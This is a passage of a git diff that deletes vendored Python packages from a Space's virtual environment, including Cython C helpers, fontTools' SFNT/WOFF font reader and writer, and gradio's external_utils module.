__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT -#if !CYTHON_PEP393_ENABLED -static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { - char* defenc_c; - PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); - if (!defenc) return NULL; - defenc_c = PyBytes_AS_STRING(defenc); -#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII - { - char* end = defenc_c + PyBytes_GET_SIZE(defenc); - char* c; - for (c = defenc_c; c < end; c++) { - if ((unsigned char) (*c) >= 128) { - PyUnicode_AsASCIIString(o); - return NULL; - } - } - } -#endif - *length = PyBytes_GET_SIZE(defenc); - return defenc_c; -} -#else -static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { - if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; -#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII - if (likely(PyUnicode_IS_ASCII(o))) { - *length = PyUnicode_GET_LENGTH(o); - return PyUnicode_AsUTF8(o); - } else { - PyUnicode_AsASCIIString(o); - return NULL; - } -#else - return PyUnicode_AsUTF8AndSize(o, length); -#endif -} -#endif -#endif -static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { -#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT - if ( -#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII - __Pyx_sys_getdefaultencoding_not_ascii && -#endif - PyUnicode_Check(o)) { - return __Pyx_PyUnicode_AsStringAndSize(o, length); - } else -#endif -#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) - if (PyByteArray_Check(o)) { - *length = PyByteArray_GET_SIZE(o); - return PyByteArray_AS_STRING(o); - } else -#endif - { - char* result; - int r = PyBytes_AsStringAndSize(o, &result, length); - if (unlikely(r < 0)) { - return NULL; - } else { - return result; - } - } -} -static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { - int is_true = x == Py_True; - if (is_true | (x == Py_False) | (x == Py_None)) return is_true; - else return PyObject_IsTrue(x); -} -static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { - int retval; - if (unlikely(!x)) return -1; - retval = __Pyx_PyObject_IsTrue(x); - Py_DECREF(x); - return retval; -} -static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { - __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); -#if PY_MAJOR_VERSION >= 3 - if (PyLong_Check(result)) { - if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, - "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " - "The ability to return an instance of a strict subclass of int is deprecated, " - "and may be removed in a future version of Python.", - result_type_name)) { - __Pyx_DECREF_TypeName(result_type_name); - Py_DECREF(result); - return NULL; - } - __Pyx_DECREF_TypeName(result_type_name); - return result; - } -#endif - PyErr_Format(PyExc_TypeError, - "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", - type_name, type_name, result_type_name); - __Pyx_DECREF_TypeName(result_type_name); - Py_DECREF(result); - return NULL; -} -static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { -#if CYTHON_USE_TYPE_SLOTS - PyNumberMethods *m; -#endif - const char *name = NULL; - PyObject *res = NULL; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_Check(x) || PyLong_Check(x))) -#else - if (likely(PyLong_Check(x))) -#endif - return __Pyx_NewRef(x); -#if CYTHON_USE_TYPE_SLOTS - m = Py_TYPE(x)->tp_as_number; - #if PY_MAJOR_VERSION < 3 - if (m && m->nb_int) { - name = "int"; - res = m->nb_int(x); - } - else if (m && m->nb_long) { - name = "long"; - res = m->nb_long(x); - } - #else - if (likely(m && m->nb_int)) { - name = "int"; - res = m->nb_int(x); - } - #endif -#else - if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { - res = PyNumber_Int(x); - } -#endif - if (likely(res)) { -#if PY_MAJOR_VERSION < 3 - if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { -#else - if (unlikely(!PyLong_CheckExact(res))) { -#endif - return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); - } - } - else if (!PyErr_Occurred()) { - PyErr_SetString(PyExc_TypeError, - "an integer is required"); - } - return res; -} -static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { - Py_ssize_t ival; - PyObject *x; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(b))) { - if (sizeof(Py_ssize_t) >= sizeof(long)) - return PyInt_AS_LONG(b); - else - return PyInt_AsSsize_t(b); - } -#endif - if (likely(PyLong_CheckExact(b))) { - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(__Pyx_PyLong_IsCompact(b))) { - return __Pyx_PyLong_CompactValue(b); - } else { - const digit* digits = __Pyx_PyLong_Digits(b); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); - switch (size) { - case 2: - if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { - return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case -2: - if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { - return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case 3: - if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { - return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case -3: - if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { - return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case 4: - if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { - return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - case -4: - if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { - return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); - } - break; - } - } - #endif - return PyLong_AsSsize_t(b); - } - x = PyNumber_Index(b); - if (!x) return -1; - ival = PyInt_AsSsize_t(x); - Py_DECREF(x); - return ival; -} -static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { - if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { - return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); -#if PY_MAJOR_VERSION < 3 - } else if (likely(PyInt_CheckExact(o))) { - return PyInt_AS_LONG(o); -#endif - } else { - Py_ssize_t ival; - PyObject *x; - x = PyNumber_Index(o); - if (!x) return -1; - ival = PyInt_AsLong(x); - Py_DECREF(x); - return ival; - } -} -static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { - return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); -} -static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { - return PyInt_FromSize_t(ival); -} - - -/* #### Code section: utility_code_pragmas_end ### */ -#ifdef _MSC_VER -#pragma warning( pop ) -#endif - - - -/* #### Code section: end ### */ -#endif /* Py_PYTHON_H */ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/sfnt.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/sfnt.py deleted file mode 100644 index 354fb85ea2fa33c93884ca5ef725ac99d9efcdb8..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/fontTools/ttLib/sfnt.py +++ /dev/null @@ -1,664 +0,0 @@ -"""ttLib/sfnt.py -- low-level module to deal with the sfnt file format. - -Defines two public classes: - SFNTReader - SFNTWriter - -(Normally you don't have to use these classes explicitly; they are -used automatically by ttLib.TTFont.) - -The reading and writing of sfnt files is separated in two distinct -classes, since whenever the number of tables changes or whenever -a table's length changes you need to rewrite the whole file anyway. -""" - -from io import BytesIO -from types import SimpleNamespace -from fontTools.misc.textTools import Tag -from fontTools.misc import sstruct -from fontTools.ttLib import TTLibError, TTLibFileIsCollectionError -import struct -from collections import OrderedDict -import logging - - -log = logging.getLogger(__name__) - - -class SFNTReader(object): - def __new__(cls, *args, **kwargs): - """Return an instance of the SFNTReader sub-class which is compatible - with the input file type. - """ - if args and cls is SFNTReader: - infile = args[0] - infile.seek(0) - sfntVersion = Tag(infile.read(4)) - infile.seek(0) - if sfntVersion == "wOF2": - # return new WOFF2Reader object - from fontTools.ttLib.woff2 import WOFF2Reader - - return object.__new__(WOFF2Reader) - # return default object - return object.__new__(cls) - - def __init__(self, file, checkChecksums=0, fontNumber=-1): - self.file = file - self.checkChecksums = checkChecksums - - self.flavor = None - self.flavorData = None - self.DirectoryEntry = SFNTDirectoryEntry - self.file.seek(0) - self.sfntVersion = self.file.read(4) - self.file.seek(0) - if self.sfntVersion == b"ttcf": - header = readTTCHeader(self.file) - numFonts = header.numFonts - if not 0 <= fontNumber < numFonts: - raise TTLibFileIsCollectionError( - "specify a font number between 0 and %d (inclusive)" - % (numFonts - 1) - ) - self.numFonts = numFonts - self.file.seek(header.offsetTable[fontNumber]) - data = self.file.read(sfntDirectorySize) - if len(data) != sfntDirectorySize: - raise TTLibError("Not a Font Collection (not enough data)") - sstruct.unpack(sfntDirectoryFormat, data, self) - elif self.sfntVersion == b"wOFF": - self.flavor = "woff" - self.DirectoryEntry = WOFFDirectoryEntry - data = self.file.read(woffDirectorySize) - if len(data) != woffDirectorySize: - raise TTLibError("Not a WOFF font (not enough data)") - sstruct.unpack(woffDirectoryFormat, data, self) - else: - data = self.file.read(sfntDirectorySize) - if len(data) != sfntDirectorySize: - raise TTLibError("Not a TrueType or OpenType font (not enough data)") - sstruct.unpack(sfntDirectoryFormat, data, self) - self.sfntVersion = Tag(self.sfntVersion) - - if self.sfntVersion not in ("\x00\x01\x00\x00", "OTTO", "true"): - raise TTLibError("Not a TrueType or OpenType font (bad sfntVersion)") - tables = {} - for i in range(self.numTables): - entry = self.DirectoryEntry() - entry.fromFile(self.file) - tag = Tag(entry.tag) - tables[tag] = entry - self.tables = OrderedDict(sorted(tables.items(), key=lambda i: i[1].offset)) - - # Load flavor data if any - if self.flavor == "woff": - self.flavorData = WOFFFlavorData(self) - - def has_key(self, tag): - return tag in self.tables - - __contains__ = has_key - - def keys(self): - return self.tables.keys() - - def __getitem__(self, tag): - """Fetch the raw table data.""" - entry = self.tables[Tag(tag)] - data = entry.loadData(self.file) - if self.checkChecksums: - if tag == "head": - # Beh: we have to special-case the 'head' table. - checksum = calcChecksum(data[:8] + b"\0\0\0\0" + data[12:]) - else: - checksum = calcChecksum(data) - if self.checkChecksums > 1: - # Be obnoxious, and barf when it's wrong - assert checksum == entry.checkSum, "bad checksum for '%s' table" % tag - elif checksum != entry.checkSum: - # Be friendly, and just log a warning. - log.warning("bad checksum for '%s' table", tag) - return data - - def __delitem__(self, tag): - del self.tables[Tag(tag)] - - def close(self): - self.file.close() - - # We define custom __getstate__ and __setstate__ to make SFNTReader pickle-able - # and deepcopy-able. When a TTFont is loaded as lazy=True, SFNTReader holds a - # reference to an external file object which is not pickleable. So in __getstate__ - # we store the file name and current position, and in __setstate__ we reopen the - # same named file after unpickling. - - def __getstate__(self): - if isinstance(self.file, BytesIO): - # BytesIO is already pickleable, return the state unmodified - return self.__dict__ - - # remove unpickleable file attribute, and only store its name and pos - state = self.__dict__.copy() - del state["file"] - state["_filename"] = self.file.name - state["_filepos"] = self.file.tell() - return state - - def __setstate__(self, state): - if "file" not in state: - self.file = open(state.pop("_filename"), "rb") - self.file.seek(state.pop("_filepos")) - self.__dict__.update(state) - - -# default compression level for WOFF 1.0 tables and metadata -ZLIB_COMPRESSION_LEVEL = 6 - -# if set to True, use zopfli instead of zlib for compressing WOFF 1.0. -# The Python bindings are available at https://pypi.python.org/pypi/zopfli -USE_ZOPFLI = False - -# mapping between zlib's compression levels and zopfli's 'numiterations'. -# Use lower values for files over several MB in size or it will be too slow -ZOPFLI_LEVELS = { - # 0: 0, # can't do 0 iterations... - 1: 1, - 2: 3, - 3: 5, - 4: 8, - 5: 10, - 6: 15, - 7: 25, - 8: 50, - 9: 100, -} - - -def compress(data, level=ZLIB_COMPRESSION_LEVEL): - """Compress 'data' to Zlib format. If 'USE_ZOPFLI' variable is True, - zopfli is used instead of the zlib module. - The compression 'level' must be between 0 and 9. 1 gives best speed, - 9 gives best compression (0 gives no compression at all). - The default value is a compromise between speed and compression (6). - """ - if not (0 <= level <= 9): - raise ValueError("Bad compression level: %s" % level) - if not USE_ZOPFLI or level == 0: - from zlib import compress - - return compress(data, level) - else: - from zopfli.zlib import compress - - return compress(data, numiterations=ZOPFLI_LEVELS[level]) - - -class SFNTWriter(object): - def __new__(cls, *args, **kwargs): - """Return an instance of the SFNTWriter sub-class which is compatible - with the specified 'flavor'. - """ - flavor = None - if kwargs and "flavor" in kwargs: - flavor = kwargs["flavor"] - elif args and len(args) > 3: - flavor = args[3] - if cls is SFNTWriter: - if flavor == "woff2": - # return new WOFF2Writer object - from fontTools.ttLib.woff2 import WOFF2Writer - - return object.__new__(WOFF2Writer) - # return default object - return object.__new__(cls) - - def __init__( - self, - file, - numTables, - sfntVersion="\000\001\000\000", - flavor=None, - flavorData=None, - ): - self.file = file - self.numTables = numTables - self.sfntVersion = Tag(sfntVersion) - self.flavor = flavor - self.flavorData = flavorData - - if self.flavor == "woff": - self.directoryFormat = woffDirectoryFormat - self.directorySize = woffDirectorySize - self.DirectoryEntry = WOFFDirectoryEntry - - self.signature = "wOFF" - - # to calculate WOFF checksum adjustment, we also need the original SFNT offsets - self.origNextTableOffset = ( - sfntDirectorySize + numTables * sfntDirectoryEntrySize - ) - else: - assert not self.flavor, "Unknown flavor '%s'" % self.flavor - self.directoryFormat = sfntDirectoryFormat - self.directorySize = sfntDirectorySize - self.DirectoryEntry = SFNTDirectoryEntry - - from fontTools.ttLib import getSearchRange - - self.searchRange, self.entrySelector, self.rangeShift = getSearchRange( - numTables, 16 - ) - - self.directoryOffset = self.file.tell() - self.nextTableOffset = ( - self.directoryOffset - + self.directorySize - + numTables * self.DirectoryEntry.formatSize - ) - # clear out directory area - self.file.seek(self.nextTableOffset) - # make sure we're actually where we want to be. (old cStringIO bug) - self.file.write(b"\0" * (self.nextTableOffset - self.file.tell())) - self.tables = OrderedDict() - - def setEntry(self, tag, entry): - if tag in self.tables: - raise TTLibError("cannot rewrite '%s' table" % tag) - - self.tables[tag] = entry - - def __setitem__(self, tag, data): - """Write raw table data to disk.""" - if tag in self.tables: - raise TTLibError("cannot rewrite '%s' table" % tag) - - entry = self.DirectoryEntry() - entry.tag = tag - entry.offset = self.nextTableOffset - if tag == "head": - entry.checkSum = calcChecksum(data[:8] + b"\0\0\0\0" + data[12:]) - self.headTable = data - entry.uncompressed = True - else: - entry.checkSum = calcChecksum(data) - entry.saveData(self.file, data) - - if self.flavor == "woff": - entry.origOffset = self.origNextTableOffset - self.origNextTableOffset += (entry.origLength + 3) & ~3 - - self.nextTableOffset = self.nextTableOffset + ((entry.length + 3) & ~3) - # Add NUL bytes to pad the table data to a 4-byte boundary. - # Don't depend on f.seek() as we need to add the padding even if no - # subsequent write follows (seek is lazy), ie. after the final table - # in the font. - self.file.write(b"\0" * (self.nextTableOffset - self.file.tell())) - assert self.nextTableOffset == self.file.tell() - - self.setEntry(tag, entry) - - def __getitem__(self, tag): - return self.tables[tag] - - def close(self): - """All tables must have been written to disk. Now write the - directory. - """ - tables = sorted(self.tables.items()) - if len(tables) != self.numTables: - raise TTLibError( - "wrong number of tables; expected %d, found %d" - % (self.numTables, len(tables)) - ) - - if self.flavor == "woff": - self.signature = b"wOFF" - self.reserved = 0 - - self.totalSfntSize = 12 - self.totalSfntSize += 16 * len(tables) - for tag, entry in tables: - self.totalSfntSize += (entry.origLength + 3) & ~3 - - data = self.flavorData if self.flavorData else WOFFFlavorData() - if data.majorVersion is not None and data.minorVersion is not None: - self.majorVersion = data.majorVersion - self.minorVersion = data.minorVersion - else: - if hasattr(self, "headTable"): - self.majorVersion, self.minorVersion = struct.unpack( - ">HH", self.headTable[4:8] - ) - else: - self.majorVersion = self.minorVersion = 0 - if data.metaData: - self.metaOrigLength = len(data.metaData) - self.file.seek(0, 2) - self.metaOffset = self.file.tell() - compressedMetaData = compress(data.metaData) - self.metaLength = len(compressedMetaData) - self.file.write(compressedMetaData) - else: - self.metaOffset = self.metaLength = self.metaOrigLength = 0 - if data.privData: - self.file.seek(0, 2) - off = self.file.tell() - paddedOff = (off + 3) & ~3 - self.file.write(b"\0" * (paddedOff - off)) - self.privOffset = self.file.tell() - self.privLength = len(data.privData) - self.file.write(data.privData) - else: - self.privOffset = self.privLength = 0 - - self.file.seek(0, 2) - self.length = self.file.tell() - - else: - assert not self.flavor, "Unknown flavor '%s'" % self.flavor - pass - - directory = sstruct.pack(self.directoryFormat, self) - - self.file.seek(self.directoryOffset + self.directorySize) - seenHead = 0 - for tag, entry in tables: - if tag == "head": - seenHead = 1 - directory = directory + entry.toString() - if seenHead: - self.writeMasterChecksum(directory) - self.file.seek(self.directoryOffset) - self.file.write(directory) - - def _calcMasterChecksum(self, directory): - # calculate checkSumAdjustment - tags = list(self.tables.keys()) - checksums = [] - for i in range(len(tags)): - checksums.append(self.tables[tags[i]].checkSum) - - if self.DirectoryEntry != SFNTDirectoryEntry: - # Create a SFNT directory for checksum calculation purposes - from fontTools.ttLib import getSearchRange - - self.searchRange, self.entrySelector, self.rangeShift = getSearchRange( - self.numTables, 16 - ) - directory = sstruct.pack(sfntDirectoryFormat, self) - tables = sorted(self.tables.items()) - for tag, entry in tables: - sfntEntry = SFNTDirectoryEntry() - sfntEntry.tag = entry.tag - sfntEntry.checkSum = entry.checkSum - sfntEntry.offset = entry.origOffset - sfntEntry.length = entry.origLength - directory = directory + sfntEntry.toString() - - directory_end = sfntDirectorySize + len(self.tables) * sfntDirectoryEntrySize - assert directory_end == len(directory) - - checksums.append(calcChecksum(directory)) - checksum = sum(checksums) & 0xFFFFFFFF - # BiboAfba! - checksumadjustment = (0xB1B0AFBA - checksum) & 0xFFFFFFFF - return checksumadjustment - - def writeMasterChecksum(self, directory): - checksumadjustment = self._calcMasterChecksum(directory) - # write the checksum to the file - self.file.seek(self.tables["head"].offset + 8) - self.file.write(struct.pack(">L", checksumadjustment)) - - def reordersTables(self): - return False - - -# -- sfnt directory helpers and cruft - -ttcHeaderFormat = """ - > # big endian - TTCTag: 4s # "ttcf" - Version: L # 0x00010000 or 0x00020000 - numFonts: L # number of fonts - # OffsetTable[numFonts]: L # array with offsets from beginning of file - # ulDsigTag: L # version 2.0 only - # ulDsigLength: L # version 2.0 only - # ulDsigOffset: L # version 2.0 only -""" - -ttcHeaderSize = sstruct.calcsize(ttcHeaderFormat) - -sfntDirectoryFormat = """ - > # big endian - sfntVersion: 4s - numTables: H # number of tables - searchRange: H # (max2 <= numTables)*16 - entrySelector: H # log2(max2 <= numTables) - rangeShift: H # numTables*16-searchRange -""" - -sfntDirectorySize = sstruct.calcsize(sfntDirectoryFormat) - -sfntDirectoryEntryFormat = """ - > # big endian - tag: 4s - checkSum: L - offset: L - length: L -""" - -sfntDirectoryEntrySize = sstruct.calcsize(sfntDirectoryEntryFormat) - -woffDirectoryFormat = """ - > # big endian - signature: 4s # "wOFF" - sfntVersion: 4s - length: L # total woff file size - numTables: H # number of tables - reserved: H # set to 0 - totalSfntSize: L # uncompressed size - majorVersion: H # major version of WOFF file - minorVersion: H # minor version of WOFF file - metaOffset: L # offset to metadata block - metaLength: L # length of compressed metadata - metaOrigLength: L # length of uncompressed metadata - privOffset: L # offset to private data block - privLength: L # length of private data block -""" - -woffDirectorySize = sstruct.calcsize(woffDirectoryFormat) - -woffDirectoryEntryFormat = """ - > # big endian - tag: 4s - offset: L - length: L # compressed length - origLength: L # original length - checkSum: L # original checksum -""" - -woffDirectoryEntrySize = sstruct.calcsize(woffDirectoryEntryFormat) - - -class DirectoryEntry(object): - def __init__(self): - self.uncompressed = False # if True, always embed entry raw - - def fromFile(self, file): - sstruct.unpack(self.format, file.read(self.formatSize), self) - - def fromString(self, str): - sstruct.unpack(self.format, str, self) - - def toString(self): - return sstruct.pack(self.format, self) - - def __repr__(self): - if hasattr(self, "tag"): - return "<%s '%s' at %x>" % (self.__class__.__name__, self.tag, id(self)) - else: - return "<%s at %x>" % (self.__class__.__name__, id(self)) - - def loadData(self, file): - file.seek(self.offset) - data = file.read(self.length) - assert len(data) == self.length - if hasattr(self.__class__, "decodeData"): - data = self.decodeData(data) - return data - - def saveData(self, file, data): - if hasattr(self.__class__, "encodeData"): - data = self.encodeData(data) - self.length = len(data) - file.seek(self.offset) - file.write(data) - - def decodeData(self, rawData): - return rawData - - def encodeData(self, data): - return data - - -class SFNTDirectoryEntry(DirectoryEntry): - - format = sfntDirectoryEntryFormat - formatSize = sfntDirectoryEntrySize - - -class WOFFDirectoryEntry(DirectoryEntry): - - format = woffDirectoryEntryFormat - formatSize = woffDirectoryEntrySize - - def __init__(self): - super(WOFFDirectoryEntry, self).__init__() - # With fonttools<=3.1.2, the only way to set a different zlib - # compression level for WOFF directory entries was to set the class - # attribute 'zlibCompressionLevel'. This is now replaced by a globally - # defined `ZLIB_COMPRESSION_LEVEL`, which is also applied when - # compressing the metadata. For backward compatibility, we still - # use the class attribute if it was already set. - if not hasattr(WOFFDirectoryEntry, "zlibCompressionLevel"): - self.zlibCompressionLevel = ZLIB_COMPRESSION_LEVEL - - def decodeData(self, rawData): - import zlib - - if self.length == self.origLength: - data = rawData - else: - assert self.length < self.origLength - data = zlib.decompress(rawData) - assert len(data) == self.origLength - return data - - def encodeData(self, data): - self.origLength = len(data) - if not self.uncompressed: - compressedData = compress(data, self.zlibCompressionLevel) - if self.uncompressed or len(compressedData) >= self.origLength: - # Encode uncompressed - rawData = data - self.length = self.origLength - else: - rawData = compressedData - self.length = len(rawData) - return rawData - - -class WOFFFlavorData: - - Flavor = "woff" - - def __init__(self, reader=None): - self.majorVersion = None - self.minorVersion = None - self.metaData = None - self.privData = None - if reader: - self.majorVersion = reader.majorVersion - self.minorVersion = reader.minorVersion - if reader.metaLength: - reader.file.seek(reader.metaOffset) - rawData = reader.file.read(reader.metaLength) - assert len(rawData) == reader.metaLength - data = self._decompress(rawData) - assert len(data) == reader.metaOrigLength - self.metaData = data - if reader.privLength: - reader.file.seek(reader.privOffset) - data = reader.file.read(reader.privLength) - assert len(data) == reader.privLength - self.privData = data - - def _decompress(self, rawData): - import zlib - - return zlib.decompress(rawData) - - -def calcChecksum(data): - """Calculate the checksum for an arbitrary block of data. - - If the data length is not a multiple of four, it assumes - it is to be padded with null byte. - - >>> print(calcChecksum(b"abcd")) - 1633837924 - >>> print(calcChecksum(b"abcdxyz")) - 3655064932 - """ - remainder = len(data) % 4 - if remainder: - data += b"\0" * (4 - remainder) - value = 0 - blockSize = 4096 - assert blockSize % 4 == 0 - for i in range(0, len(data), blockSize): - block = data[i : i + blockSize] - longs = struct.unpack(">%dL" % (len(block) // 4), block) - value = (value + sum(longs)) & 0xFFFFFFFF - return value - - -def readTTCHeader(file): - file.seek(0) - data = file.read(ttcHeaderSize) - if len(data) != ttcHeaderSize: - raise TTLibError("Not a Font Collection (not enough data)") - self = SimpleNamespace() - sstruct.unpack(ttcHeaderFormat, data, self) - if self.TTCTag != "ttcf": - raise TTLibError("Not a Font Collection") - assert self.Version == 0x00010000 or self.Version == 0x00020000, ( - "unrecognized TTC version 0x%08x" % self.Version - ) - self.offsetTable = struct.unpack( - ">%dL" % self.numFonts, file.read(self.numFonts * 4) - ) - if self.Version == 0x00020000: - pass # ignoring version 2.0 signatures - return self - - -def writeTTCHeader(file, numFonts): - self = SimpleNamespace() - self.TTCTag = "ttcf" - self.Version = 0x00010000 - self.numFonts = numFonts - file.seek(0) - file.write(sstruct.pack(ttcHeaderFormat, self)) - offset = file.tell() - file.write(struct.pack(">%dL" % self.numFonts, *([0] * self.numFonts))) - return offset - - -if __name__ == "__main__": - import sys - import doctest - - sys.exit(doctest.testmod().failed) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/external_utils.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/external_utils.py deleted file mode 100644 index 9a6064bd25da68c51ee9b09f3551e2a31fdb253b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/gradio/external_utils.py +++ /dev/null @@ -1,140 +0,0 @@ -"""Utility function for gradio/external.py""" - -import base64 -import math -import operator -import re -import warnings -from typing import Dict, List, Tuple - -import requests -import yaml - -from gradio import components - -################## -# Helper functions for processing tabular data -################## - - -def get_tabular_examples(model_name: str) -> Dict[str, List[float]]: - readme = requests.get(f"https://huggingface.co/{model_name}/resolve/main/README.md") - if readme.status_code != 200: - warnings.warn(f"Cannot load examples from README for {model_name}", UserWarning) - example_data = {} - else: - yaml_regex = re.search( - "(?:^|[\r\n])---[\n\r]+([\\S\\s]*?)[\n\r]+---([\n\r]|$)", readme.text - ) - if yaml_regex is None: - example_data = {} - else: - example_yaml = next( - yaml.safe_load_all(readme.text[: yaml_regex.span()[-1]]) - ) - example_data = example_yaml.get("widget", {}).get("structuredData", {}) - if not example_data: - raise ValueError( - f"No example data found in README.md of {model_name} - Cannot build gradio demo. " - "See the README.md here: https://huggingface.co/scikit-learn/tabular-playground/blob/main/README.md " - "for a reference on how to provide example data to your model." - ) - # replace nan with string NaN for inference API - for data in example_data.values(): - for i, val in enumerate(data): - if isinstance(val, float) and math.isnan(val): - data[i] = "NaN" - return example_data - - -def cols_to_rows( - example_data: Dict[str, List[float]] -) -> Tuple[List[str], List[List[float]]]: - headers = list(example_data.keys()) - n_rows = max(len(example_data[header] or []) for header in headers) - data = [] - for row_index in range(n_rows): - row_data = [] - for header in headers: - col = example_data[header] or [] - if row_index >= len(col): - row_data.append("NaN") - else: - row_data.append(col[row_index]) - data.append(row_data) - return headers, data - - -def rows_to_cols(incoming_data: Dict) -> Dict[str, Dict[str, Dict[str, List[str]]]]: - data_column_wise = {} - for i, header in enumerate(incoming_data["headers"]): - data_column_wise[header] = [str(row[i]) for row in incoming_data["data"]] - return {"inputs": {"data": data_column_wise}} - - -################## -# Helper functions for processing other kinds of data -################## - - -def postprocess_label(scores: Dict) -> Dict: - sorted_pred = sorted(scores.items(), key=operator.itemgetter(1), reverse=True) - return { - "label": sorted_pred[0][0], - "confidences": [ - {"label": pred[0], "confidence": pred[1]} for pred in sorted_pred - ], - } - - -def encode_to_base64(r: requests.Response) -> str: - # Handles the different ways HF API returns the prediction - base64_repr = base64.b64encode(r.content).decode("utf-8") - data_prefix = ";base64," - # Case 1: base64 representation already includes data prefix - if data_prefix in base64_repr: - return base64_repr - else: - content_type = r.headers.get("content-type") - # Case 2: the data prefix is a key in the response - if content_type == "application/json": - try: - data = r.json()[0] - content_type = data["content-type"] - base64_repr = data["blob"] - except KeyError as ke: - raise ValueError( - "Cannot determine content type returned by external API." - ) from ke - # Case 3: the data prefix is included in the response headers - else: - pass - new_base64 = f"data:{content_type};base64,{base64_repr}" - return new_base64 - - -################## -# Helper function for cleaning up an Interface loaded from HF Spaces -################## - - -def streamline_spaces_interface(config: Dict) -> Dict: - """Streamlines the interface config dictionary to remove unnecessary keys.""" - config["inputs"] = [ - components.get_component_instance(component) - for component in config["input_components"] - ] - config["outputs"] = [ - components.get_component_instance(component) - for component in config["output_components"] - ] - parameters = { - "article", - "description", - "flagging_options", - "inputs", - "outputs", - "title", - } - config = {k: config[k] for k in parameters} - return config diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/huggingface_hub/_multi_commits.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/huggingface_hub/_multi_commits.py deleted file mode 100644 index c41d2a36fc0971ad031e05d851e632b263f10e48..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/huggingface_hub/_multi_commits.py +++ /dev/null @@ -1,305 +0,0 @@ -# coding=utf-8 -# Copyright 2023-present, the HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Contains utilities to multi-commits (i.e. push changes iteratively on a PR).""" -import re -from dataclasses import dataclass, field -from hashlib import sha256 -from typing import TYPE_CHECKING, Iterable, List, Optional, Set, Tuple, Union - -from ._commit_api import CommitOperationAdd, CommitOperationDelete -from .community import DiscussionWithDetails -from .utils import experimental -from .utils._cache_manager import _format_size - - -if 